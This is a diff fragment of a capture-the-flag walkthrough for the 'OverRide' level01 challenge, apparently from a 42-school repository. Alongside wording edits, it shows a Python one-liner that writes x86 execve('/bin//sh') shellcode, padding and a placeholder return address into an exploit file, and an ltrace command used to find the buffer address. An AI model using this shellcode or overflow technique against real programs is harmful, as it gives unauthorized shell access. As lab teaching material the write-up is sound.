eprei/42_override/level01/Ressources/walkthrough.md

 exploit = payload + "A" * (80 - 21) + shellcode_address

-Since we don't know yet the shellcode's address, we use `0x42424242` at its place temporary.
+Since we don't know the shellcode's address yet, we use `0x42424242` as a placeholder for now.
 We use Python to generate the exploit and save it to a file:

 ```shell
 level01@OverRide ~ $ python2 -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" + "A" * (80 - 21) + "\x42\x42\x42\x42"' > /tmp/exploit1
 ```

-# Finding the shellcode address
+## Finding the shellcode address

-To find the address of the shellcode, we can use `ltrace` to trace the execution of the program and the address of the buffer where the shellcode is stored. `level01` reads two times from the standard input, so we provide the username and the shellcode in two separate inputs.
-Reading the return address of fgets, we can find the address of the buffer where the shellcode is stored: `0xffffd68c`.
+To find the address of the shellcode, we can use `ltrace` to trace the execution of the program and determine the address where the shellcode is stored. `level01` reads twice from standard input, so we provide the username and the shellcode as two separate inputs.
+By checking the return value of `fgets`, we find the address of the buffer where the shellcode is stored: `0xffffd68c`.

 ```shell
 level01@OverRide ~ $ (echo "dat_wil" ; cat /tmp/exploit1;) | ltrace ./level01